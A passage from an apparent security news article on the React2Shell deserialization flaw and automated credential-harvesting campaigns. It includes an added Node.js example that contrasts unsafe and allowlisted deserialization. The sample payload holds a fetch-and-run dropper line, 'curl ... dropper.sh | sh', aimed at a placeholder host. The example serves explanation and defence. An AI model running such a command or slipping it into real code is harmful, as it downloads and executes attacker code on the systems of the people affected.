
The attacker crafts a malicious serialized payload that abuses the server's deserialization routine, a well-established technique for triggering arbitrary object instantiation or method invocation on the server. The payload is sent in an HTTP request directly to a Server Function endpoint; no authentication is required. When the server deserializes it, the result is arbitrary code execution in the server-side Node.js process.
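To make the mechanism in the paragraph above concrete, here is an added Node.js illustration of the deserialization bug class it describes: a toy deserializer that lets the payload choose the class to instantiate and the method to call, beside a hardened version with a type allowlist, a server-chosen entry method and per-type argument validation. This is example code written for this page, not React's Server Components implementation and not the React2Shell exploit; the types (Greeting, ShellTask), the payload keys ($type, $call, args) and the c2.invalid command string are constructed stand-ins, and the real wire format differs.

```javascript
// Added illustration of the deserialization bug class described in the article:
// attacker-controlled serialized data steering object instantiation and method
// invocation in a Node.js process. Not React's code and not the React2Shell
// exploit; the types, payload keys ($type/$call/args) and the command string
// below are constructed stand-ins.

// A type the application legitimately serializes.
class Greeting {
  constructor({ name }) { this.name = name; }
  render() { return `Hello, ${this.name}`; }
}

// Stand-in for a dangerous capability reachable in the same process
// (think child_process.exec). It records what would have run instead of running it.
const sideEffects = [];
class ShellTask {
  constructor({ cmd }) { this.cmd = cmd; }
  run() { sideEffects.push(this.cmd); return `ran:${this.cmd}`; }
}

// UNSAFE: the payload picks the constructor, its arguments and the method to
// call, resolved from a table of everything the process knows about. This is
// the shape of "arbitrary object instantiation or method invocation".
const knownTypes = { Greeting, ShellTask };

function unsafeDeserialize(json) {
  const obj = JSON.parse(json);
  const Ctor = knownTypes[obj.$type];   // attacker-chosen class
  const instance = new Ctor(obj.args);  // attacker-chosen constructor args
  return instance[obj.$call]();         // attacker-chosen method
}

// HARDENED: a Map-based allowlist (a Map lookup ignores prototype keys such as
// "constructor", unlike a plain-object lookup), a server-chosen entry method
// per type, and per-type argument validation. Anything else is rejected.
const allowedTypes = new Map([
  ['Greeting', {
    ctor: Greeting,
    method: 'render',
    validate: (a) => a !== null && typeof a === 'object'
      && typeof a.name === 'string' && a.name.length <= 64,
  }],
]);

function safeDeserialize(json) {
  let obj;
  try { obj = JSON.parse(json); } catch { throw new Error('malformed payload'); }
  if (obj === null || typeof obj !== 'object' || typeof obj.$type !== 'string') {
    throw new Error('malformed payload');
  }
  const entry = allowedTypes.get(obj.$type);
  if (!entry) throw new Error(`type not allowed: ${obj.$type}`);
  if (!entry.validate(obj.args)) throw new Error('invalid arguments');
  const instance = new entry.ctor(obj.args);
  return instance[entry.method]();      // method fixed by the server, not the payload
}

// Constructed sample payloads: one benign, one in the shape of the dropper
// stage the article describes (fetch a script and run it). The URL is a placeholder.
const DROPPER_CMD = 'curl -s http://c2.invalid/dropper.sh | sh';
const benignPayload = JSON.stringify({ $type: 'Greeting', $call: 'render', args: { name: 'Ada' } });
const maliciousPayload = JSON.stringify({ $type: 'ShellTask', $call: 'run', args: { cmd: DROPPER_CMD } });

// Runs both deserializers over both payloads and returns what each did.
function demo() {
  const results = {
    unsafeBenign: unsafeDeserialize(benignPayload),
    unsafeMalicious: unsafeDeserialize(maliciousPayload),  // "runs" the dropper
    safeBenign: safeDeserialize(benignPayload),
    safeMalicious: null,
  };
  try { safeDeserialize(maliciousPayload); } catch (e) { results.safeMalicious = e.message; }
  return results;
}

console.log(demo());
```

The point of the hardened version is that nothing in the payload selects code: the allowlist decides which constructors exist, the server decides which method runs, and the validator decides what arguments are acceptable. Using a Map rather than a plain object for the allowlist also closes the prototype-key probe (`$type: "constructor"`) that a plain-object lookup would resolve.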
Once it has code execution, the initial React exploit delivers a small dropper that fetches and runs a multi-phase harvesting script. The script works through several phases, collecting data from the compromised system and uploading it to a command-and-control server, where it is loaded into a database.
Industrial scale
“This is all about neglect and efficiency,” Gene Moody, field CTO at patch management provider Action1, told CSO. “React2Shell quickly met all the criteria attackers look for: public disclosure, reliable exploitation, and internet-facing exposure. That combination effectively guaranteed widespread abuse. Since then, multiple campaigns have automated the full [attack] lifecycle [of] scanning, exploitation, and credential harvesting, with little to no human intervention.”
